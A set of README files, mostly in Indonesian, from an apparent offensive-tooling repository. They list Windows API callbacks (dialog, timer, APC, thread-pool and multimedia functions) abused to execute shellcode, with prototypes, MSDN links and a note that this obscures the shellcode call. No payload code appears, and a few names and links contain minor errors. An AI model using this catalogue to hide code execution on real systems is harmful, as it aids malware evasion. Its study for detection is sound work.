/windows/execution/callback/NotifyRouteChange2/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `NotifyRouteChange2`. 8 | 9 | ```c++ 10 | IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API 11 | NotifyRouteChange2 (ADDRESS_FAMILY AddressFamily, PIPFORWARD_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE NotificationHandle); 12 | ``` 13 | 14 | ### Reference 15 | 16 | - [MSDN NotifyRouteChange2](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyroutechange2) -------------------------------------------------------------------------------- /windows/execution/callback/NotifyTeredoPortChange/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `NotifyTeredoPortChange`. 8 | 9 | ```c++ 10 | IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API 11 | NotifyTeredoPortChange ( PTEREDO_PORT_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle); 12 | ``` 13 | 14 | ### Reference 15 | 16 | - [MSDN NotifyTeredoPortChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyteredoportchange) -------------------------------------------------------------------------------- /windows/execution/callback/NotifyUnicastIpAddressChange/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `NotifyUnicastIpAddressChange`. 8 | 9 | ```c++ 10 | IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API 11 | NotifyUnicastIpAddressChange (ADDRESS_FAMILY Family, PUNICAST_IPADDRESS_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle); 12 | ``` 13 | 14 | ### Reference 15 | 16 | - [MSDN NotifyUnicastIpAddressChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyunicastipaddresschange) -------------------------------------------------------------------------------- /windows/execution/callback/PageSetupDlg/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `PageSetupDlg`. 8 | 9 | ```c++ 10 | BOOL PageSetupDlg (LPPAGESETUPDLG lpcf); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN PageSetupDlg](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646937(v=vs.85)) 16 | - [MSDN structure PAGESETUPDLGA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-pagesetupdlga) 17 | - [MSDN structure PAGESETUPDLGW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-pagesetupdlgw) -------------------------------------------------------------------------------- /windows/execution/callback/PlaExtractCabinet/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `PlaExtractCabinet`. 8 | 9 | ```c++ 10 | HRESULT PlaExtractCabinet (PCWSTR CabFileName, PCWSTR DestPath, PLA_CABEXTRACT_CALLBACK Callback, PVOID Context); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [github pla.h](https://github.com/nihon-tc/Rtest/blob/master/header/Microsoft%20SDKs/Windows/v7.0A/Include/pla.h) -------------------------------------------------------------------------------- /windows/execution/callback/PrintDlg/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `PrintDlg`. 8 | 9 | ```c++ 10 | BOOL PrintDlg (LPPRINTDLG lppd); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN PrintDlg](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646940(v=vs.85)) 16 | - [MSDN structure PRINTDLGA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-printdlga) 17 | - [MSDN structure PRINTDLGW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-printdlgW) -------------------------------------------------------------------------------- /windows/execution/callback/PropertySheet/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `PropertySheet`. 8 | 9 | ```c++ 10 | INT_PTR PropertySheetA (LPCPROPSHEETHEADERA header); 11 | 12 | INT_PTR PropertySheetW (LPCPROPSHEETHEADERW header); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN PropertySheetA](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-propertysheeta) 18 | - [MSDN PropertySheetW](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-propertysheetw) 19 | - [MSDN structure PROPSHEETHEADER](https://docs.microsoft.com/en-us/windows/win32/controls/pss-propsheetheader) -------------------------------------------------------------------------------- /windows/execution/callback/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Melakukan penyalahgunaan windows API untuk mengeksekusi shellcode sebagai callback. 6 | 7 | Sebagian windows API menerima callback yang akan dijalankan untuk menangani objek atau memproses hasil operasi. Dengan menjalankan shellcode sebagai callback, kode menjadi lebih tersamarkan karena pemanggilan shellcode menjadi implisit. 8 | 9 | Umumnya callback akan berjalan pada thread yang sama dengan thread yang memanggil fungsi windows API. -------------------------------------------------------------------------------- /windows/execution/callback/ReadFileEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `ReadFileEx`. 8 | 9 | ```c++ 10 | BOOL ReadFileEx (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPOVERLAPPED lpOverlapped, LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine); 11 | 12 | HANDLE CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 13 | 14 | HANDLE CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN ReadFileEx](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfileex) 20 | - [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) 21 | - [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew) -------------------------------------------------------------------------------- /windows/execution/callback/SHBrowseForFolder/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `SHBrowseForFolder`. 8 | 9 | ```c++ 10 | PIDLIST_ABSOLUTE SHBrowseForFolderA (LPBROWSEINFOA lpbi); 11 | 12 | PIDLIST_ABSOLUTE SHBrowseForFolderW (LPBROWSEINFOA lpbi); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN SHBrowseForFolderA](https://docs.microsoft.com/en-us/windows/win32/api/shlobj_core/nf-shlobj_core-shbrowseforfoldera) 18 | - [MSDN SHBrowseForFolderW](https://docs.microsoft.com/en-us/windows/win32/api/shlobj_core/nf-shlobj_core-shbrowseforfolderw) -------------------------------------------------------------------------------- /windows/execution/callback/SendMessageCallback/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `SendMessageCallback`. Fungsi ini akan mengirimkan sebuah message ke window dan menjalankan callback apabila message diproses. Dengan memproses message secara manual, callback akan dipicu. 8 | 9 | ```c++ 10 | BOOL SendMessageCallbackA (HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam, SENDASYNCPROC lpResultCallBack, ULONG_PTR dwData); 11 | 12 | BOOL SendMessageCallbackW (HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam, SENDASYNCPROC lpResultCallBack, ULONG_PTR dwData); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN SendMessageCallbackA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-sendmessagecallbacka) 18 | - [MSDN SendMessageCallbackW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-sendmessagecallbackw) -------------------------------------------------------------------------------- /windows/execution/callback/SetWinEventHook/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `SetWinEventHook`. 8 | 9 | ```c++ 10 | HWINEVENTHOOK SetWinEventHook(DWORD eventMin,DWORD eventMax,HMODULE hmodWinEventProc,WINEVENTPROC pfnWinEventProc,DWORD idProcess,DWORD idThread,DWORD dwFlags); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN SetWinEventHook](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwineventhook) 16 | - [MSDN GetMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getmessage) 17 | - [MSDN TranslateMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-translatemessage) 18 | - [MSDN DispatchMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dispatchmessage) -------------------------------------------------------------------------------- /windows/execution/callback/SymEnumProcesses/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `SymEnumProcesses`. 8 | 9 | ```c++ 10 | BOOL IMAGEAPI SymEnumProcesses (PSYM_ENUMPROCESSES_CALLBACK EnumProcessesCallback, PVOID UserContext); 11 | 12 | BOOL IMAGEAPI SymInitialize (HANDLE hProcess, PCSTR UserSearchPath, BOOL fInvadeProcess); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN SymEnumProcesses](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symenumprocesses) 18 | - [MSDN SymInitialize](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-syminitialize) -------------------------------------------------------------------------------- /windows/execution/callback/SymFindFileInPath/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `SymFindFileInPath`. 8 | 9 | ```c++ 10 | BOOL IMAGEAPI SymFindFileInPath ( HANDLE hprocess, PCSTR SearchPath, PCSTR FileName, PVOID id, DWORD two, DWORD three, DWORD flags, PSTR FoundFile, PFINDFILEINPATHCALLBACK callback, PVOID context); 11 | 12 | BOOL IMAGEAPI SymSrvGetFileIndexInfo (PCSTR File, PSYMSRV_INDEX_INFO Info, DWORD Flags); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN SymFindFileInPath](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symfindfileinpath) 18 | - [MSDN SymSrvGetFileIndexInfo](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symsrvgetfileindexinfo) -------------------------------------------------------------------------------- /windows/execution/callback/VerifierEnumerateResource/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `VerifierEnumerateResource`. 8 | 9 | ```c++ 10 | ULONG VerifierEnumerateResource (HANDLE Process, ULONG Flags, ULONG ResourceType, AVRF_RESOURCE_ENUMERATE_CALLBACK ResourceCallback, PVOID EnumerationContext); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN VerifierEnumerateResource](https://docs.microsoft.com/en-us/windows/win32/api/avrfsdk/nf-avrfsdk-verifierenumerateresource) -------------------------------------------------------------------------------- /windows/execution/callback/WriteFileEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `WriteFileEx`. 8 | 9 | ```c++ 10 | BOOL WriteFileEx (HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPOVERLAPPED lpOverlapped, LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine); 11 | 12 | HANDLE CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 13 | 14 | HANDLE CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN WriteFileEx](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefileex) 20 | - [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) 21 | - [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew) -------------------------------------------------------------------------------- /windows/execution/callback/WsPullBytes/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `WsPullBytes`. 8 | 9 | ```c++ 10 | HRESULT WsPullBytes (WS_XML_WRITER *writer, WS_PULL_BYTES_CALLBACK callback, void *callbackState, WS_ERROR *error); 11 | 12 | HRESULT WsCreateWriter (const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_XML_WRITER **writer, WS_ERROR *error); 13 | 14 | HRESULT WsSetOutput (WS_XML_WRITER *writer, const WS_XML_WRITER_ENCODING *encoding, const WS_XML_WRITER_OUTPUT *output, const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_ERROR *error); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN WsPullBytes](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wspullbytes) 20 | - [MSDN WsCreateWriter](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wscreatewriter) 21 | - [MSDN WsSetOutput](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wssetoutput) -------------------------------------------------------------------------------- /windows/execution/callback/WsPushBytes/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `WsPushBytes`. 8 | 9 | ```c++ 10 | HRESULT WsPushBytes (WS_XML_WRITER *writer, WS_PUSH_BYTES_CALLBACK callback, void *callbackState, WS_ERROR *error); 11 | 12 | HRESULT WsCreateWriter (const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_XML_WRITER **writer, WS_ERROR *error); 13 | 14 | HRESULT WsSetOutput (WS_XML_WRITER *writer, const WS_XML_WRITER_ENCODING *encoding, const WS_XML_WRITER_OUTPUT *output, const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_ERROR *error); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN WsPushBytes](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wspushbytes) 20 | - [MSDN WsCreateWriter](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wscreatewriter) 21 | - [MSDN WsSetOutput](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wssetoutput) -------------------------------------------------------------------------------- /windows/execution/callback/acmDriverEnum/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `acmDriverEnum`. 8 | 9 | ```c++ 10 | MMRESULT ACMAPI acmDriverEnum(ACMDRIVERENUMCB fnCallback, DWORD_PTR dwInstance, DWORD fdwEnum); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN acmDriverEnum](https://learn.microsoft.com/en-us/windows/win32/api/msacm/nf-msacm-acmdriverenum) -------------------------------------------------------------------------------- /windows/execution/callback/mciSetYieldProc/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `mciSetYieldProc`. 8 | 9 | Shellcode akan dipanggil secara berkala (periodik) ketika MCI device menerima flag MCI_WAIT. 10 | 11 | ```c++ 12 | UINT mciSetYieldProc (MCIDEVICEID IDDevice, YIELDPROC yp, DWORD dwYieldData); 13 | 14 | MCIERROR mciSendCommand (MCIDEVICEID IDDevice, UINT uMsg, DWORD_PTR fdwCommand, DWORD_PTR dwParam); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN mciSetYieldProc](https://docs.microsoft.com/en-us/previous-versions/dd757163(v=vs.85)) 20 | - [MSDN mciSendCommand](https://docs.microsoft.com/en-us/previous-versions//dd757160(v=vs.85)) -------------------------------------------------------------------------------- /windows/execution/callback/mmioInstallIOProc/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `mmioInstallIOProc`. 8 | 9 | ```c++ 10 | LPMMIOPROC mmioInstallIOProc (FOURCC fccIOProc, LPMMIOPROC pIOProc, DWORD dwFlags); 11 | 12 | MCIERROR mciSendString (LPCTSTR lpszCommand, LPTSTR lpszReturnString, UINT cchReturn, HANDLE hwndCallback); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN mmioInstallIOProc](https://docs.microsoft.com/en-us/windows/win32/api/mmiscapi/nf-mmiscapi-mmioinstallioproc) 18 | - [MSDN mciSendString](https://docs.microsoft.com/en-us/previous-versions//dd757161(v=vs.85)) -------------------------------------------------------------------------------- /windows/execution/callback/waveInOpen/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `waveInOpen`. 8 | 9 | ```c++ 10 | MMRESULT waveInOpen(LPHWAVEIN phwi, UINT uDeviceID, LPCWAVEFORMATEX pwfx, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN waveInOpen](https://learn.microsoft.com/en-us/windows/win32/api/mmeapi/nf-mmeapi-waveinopen) 16 | - [MSDN structure WAVEFORMATEX](https://learn.microsoft.com/en-us/previous-versions/dd757713(v=vs.85)) -------------------------------------------------------------------------------- /windows/execution/callback/waveOutOpen/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `waveOutOpen`. 8 | 9 | ```c++ 10 | MMRESULT waveOutOpen(LPHWAVEOUT phwo, UINT uDeviceID, LPCWAVEFORMATEX pwfx, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN waveOutOpen](https://learn.microsoft.com/en-us/windows/win32/api/mmeapi/nf-mmeapi-waveoutopen) 16 | - [MSDN structure WAVEFORMATEX](https://learn.microsoft.com/en-us/previous-versions/dd757713(v=vs.85)) -------------------------------------------------------------------------------- /windows/execution/event/CreateThreadpoolTimer/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode using timer. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CreateThreadpoolTimer`. 8 | 9 | Thread pool adalah sekumpulan worker thread yang mengeksekusi callback secara asinkron. 10 | 11 | ```c++ 12 | PTP_TIMER CreateThreadpoolTimer(PTP_TIMER_CALLBACK pfnti, PVOID pv, PTP_CALLBACK_ENVIRON pcbe); 13 | 14 | void SetThreadpoolTimer(PTP_TIMER pti, PFILETIME pftDueTime, DWORD msPeriod, DWORD msWindowLength); 15 | 16 | HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName); 17 | 18 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 19 | ``` 20 | 21 | ### Reference 22 | 23 | - [MSDN CreateThreadpoolTimer](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpooltimer) 24 | - [MSDN SetThreadpoolTimer](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-setthreadpooltimer) 25 | - [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa) 26 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject) -------------------------------------------------------------------------------- /windows/execution/event/CreateThreadpoolWait/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a thread. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CreateThreadpoolWait`. 8 | 9 | Thread pool adalah sekumpulan worker thread yang mengeksekusi callback secara asinkron. 10 | 11 | ```c++ 12 | PTP_WAIT CreateThreadpoolWait(PTP_WAIT_CALLBACK pfnwa, PVOID pv, PTP_CALLBACK_ENVIRON pcbe); 13 | 14 | void SetThreadpoolWait(PTP_WAIT pwa, HANDLE h, PFILETIME pftTimeout); 15 | 16 | HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName); 17 | 18 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 19 | ``` 20 | 21 | ### Reference 22 | 23 | - [MSDN CreateThreadpoolWait](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpoolwait) 24 | - [MSDN SetThreadpoolWait](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-setthreadpoolwait) 25 | - [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa) 26 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject) -------------------------------------------------------------------------------- /windows/execution/event/CreateTimerQueueTimer/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode using timer. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CreateTimerQueue` dan `CreateTimerQueueTimer`. 8 | 9 | Timer Queue digunakan untuk menampung objek timer ke dalam antrean. Sebuah objek timer adalah objek lightweight yang dapat digunakan untuk memanggil callback saat waktu tertentu. 10 | 11 | ```c++ 12 | HANDLE CreateTimerQueue (); 13 | 14 | BOOL CreateTimerQueueTimer(PHANDLE phNewTimer, HANDLE TimerQueue, WAITORTIMERCALLBACK Callback, PVOID Parameter, DWORD DueTime, DWORD Period, ULONG Flags); 15 | 16 | HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName); 17 | 18 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 19 | ``` 20 | 21 | ### Reference 22 | 23 | - [MSDN CreateTimerQueue](https://docs.microsoft.com/en-us/windows/win32/api/threadpoollegacyapiset/nf-threadpoollegacyapiset-createtimerqueue) 24 | - [MSDN CreateTimerQueueTimer](https://docs.microsoft.com/en-us/windows/win32/api/threadpoollegacyapiset/nf-threadpoollegacyapiset-createtimerqueuetimer) 25 | - [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa) 26 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject) -------------------------------------------------------------------------------- /windows/execution/event/NtQueueApcThread/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode by queueing into APC (Asynchronous Procedure Call). 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `NtQueueApcThread`. 8 | 9 | ```c++ 10 | NTSTATUS NtQueueApcThread (HANDLE ThreadHandle, PIO_APC_ROUTINE ApcRoutine, PVOID ApcRoutineContext, PIO_STATUS_BLOCK ApcStatusBlock, ULONG ApcReserved); 11 | 12 | NTSTATUS NtTestAlert(); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN NtQueueApcThread](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtQueueApcThread.html) 18 | - [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html) 19 | - [BLOG APC Series: User APC API Low Level Pleasure](https://repnz.github.io/posts/apc/user-apc/) -------------------------------------------------------------------------------- /windows/execution/event/NtQueueApcThreadEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode by queueing into APC (Asynchronous Procedure Call). 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `NtQueueApcThreadEx`. 8 | 9 | ```c++ 10 | NTSTATUS 11 | NtQueryApcThreadEx (HANDLE ThreadHandle, USER_APC_OPTION UserApcOption, PPS_APC_ROUTINE ApcRoutine, PVOID SystemArgument1, PVOID SystemArgument2, PVOID SystemArgument3); 12 | 13 | NTSTATUS NtTestAlert(); 14 | ``` 15 | 16 | ### Reference 17 | 18 | - [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html) 19 | - [BLOG APC Series: User APC API](https://repnz.github.io/posts/apc/user-apc/) -------------------------------------------------------------------------------- /windows/execution/event/QueueUserAPC/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode by queueing into APC (Asynchronous Procedure Call). 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `QueueUserAPC`. 8 | 9 | ```c++ 10 | DWORD QueueUserAPC(PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData); 11 | 12 | NTSTATUS NtTestAlert(); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN QueueUserAPC](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc) 18 | - [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html) -------------------------------------------------------------------------------- /windows/execution/event/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Eksekusi shellcode berdasarkan event tertentu. 6 | -------------------------------------------------------------------------------- /windows/execution/event/RegisterWaitForSingleObject/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode using timer. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `RegisterWaitForSingleObject`. 8 | 9 | ```c++ 10 | BOOL RegisterWaitForSingleObject(PHANDLE phNewWaitObject, HANDLE hObject, WAITORTIMERCALLBACK Callback, PVOID Context, ULONG dwMilliseconds, ULONG dwFlags); 11 | 12 | HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName); 13 | 14 | BOOL UnregisterWait(HANDLE WaitHandle); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN RegisterWaitForSingleObject](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-registerwaitforsingleobject) 20 | - [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa) 21 | - [MSDN UnregisterWait](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-unregisterwait) -------------------------------------------------------------------------------- /windows/execution/event/SetTimer/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode using timer. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `SetTimer`. 8 | 9 | 10 | ```c++ 11 | UINT_PTR SetTimer (HWND hWnd, UINT_PTR nIDEvent, UINT uElapse, TIMERPROC lpTimerFunc); 12 | ``` 13 | 14 | ### Reference 15 | 16 | - [MSDN SetTimer](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-settimer) 17 | -------------------------------------------------------------------------------- /windows/execution/event/timeSetEvent/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 